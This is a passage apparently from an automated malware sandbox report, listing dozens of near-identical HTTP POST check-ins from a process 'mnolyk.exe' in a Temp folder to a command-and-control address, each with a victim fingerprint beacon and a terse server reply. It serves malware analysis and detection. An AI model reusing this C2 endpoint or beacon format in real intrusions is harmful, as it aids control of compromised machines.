                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.928950071 CET296INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      182192.168.2.74987762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:49.111851931 CET297OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.175546885 CET297INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      183192.168.2.74987862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:49.349230051 CET298OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.413600922 CET298INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      184192.168.2.74987962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:49.589027882 CET299OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.653786898 CET299INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      185192.168.2.74988062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:49.880281925 CET300OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:49.943093061 CET300INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      186192.168.2.74988162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:50.123193026 CET301OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.187123060 CET301INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      187192.168.2.74988262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:50.365010023 CET302OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.429949045 CET302INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      188192.168.2.74988362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:50.617718935 CET303OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.682765961 CET303INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      189192.168.2.74988462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:50.864769936 CET304OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:50.929433107 CET304INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      19192.168.2.74971362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:06.192940950 CET123OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.257908106 CET123INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      190192.168.2.74988562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:51.097831964 CET305OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.160739899 CET305INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      191192.168.2.74988662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:51.330001116 CET306OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.391896963 CET306INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      192192.168.2.74988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:51.576052904 CET307OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.638092041 CET307INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      193192.168.2.74988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:51.818185091 CET308OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:51.879987001 CET308INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      194192.168.2.74988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:52.061130047 CET309OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.125670910 CET309INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      195192.168.2.74989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:52.300017118 CET310OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.362855911 CET310INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      196192.168.2.74989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:52.534100056 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.596692085 CET311INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      197192.168.2.74989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:52.780225039 CET312OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:52.843852043 CET312INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      198192.168.2.74989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:53.025577068 CET313OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.090089083 CET313INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      199192.168.2.74989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:53.270340919 CET314OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:53.332096100 CET314INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
